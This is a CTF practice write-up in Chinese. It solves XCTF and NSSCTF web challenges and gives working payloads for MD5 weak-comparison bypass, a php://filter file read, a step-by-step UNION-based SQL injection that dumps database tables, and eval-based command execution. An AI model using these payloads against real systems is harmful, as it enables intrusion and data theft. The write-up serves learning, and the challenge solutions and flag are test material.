碰到web题老是被卡,故开始刷题
攻防世界
攻防世界 (xctf.org.***)
1.ip>>X-Forwarded-For
2.referer表示来自
NSS
[SWPUCTF 2021 新生赛]gift_F12
https://www.nssctf.***/problem/382
全局搜索flag别忘记看hint改flag的格式
[SWPUCTF 2021 新生赛]jicao
1.代码审计,注意json格式解码,post
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>
NSSCTF{75422e92-a2b6-4ad2-ab28-3febd84a3bf9}
[SWPUCTF 2021 新生赛]easy_md5
md5绕过
a.弱等于(==)绕过
url:
http://node5.anna.nssctf.***:28158?name=240610708
post:
password=QLTHNDT
b.数组绕过:
参考:[SWPUCTF 2021 新生赛]easy_md5-CSDN博客
[SWPUCTF 2021 新生赛]include
include_once($file);
include题目的标志
node4.anna.nssctf.***:28571/?file=php://filter/read=convert.base64-encode/resource=flag.php
伪协议读取
[SWPUCTF 2021 新生赛]easy_sql
?wllm=-1' order by 3--+
?wllm=-1' order by 4--+
?wllm=-1' union select 1,2,3--+
?wllm=-1' union select 1,2,database()--+
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+
参考:
sql注入详解-CSDN博客
group_concat用法详解-CSDN博客
[SWPUCTF 2021 新生赛]easyrce
rec:eval
/?url=system("ls%20/");
/?url=system("cat%20/flllllaaaaaaggggggg");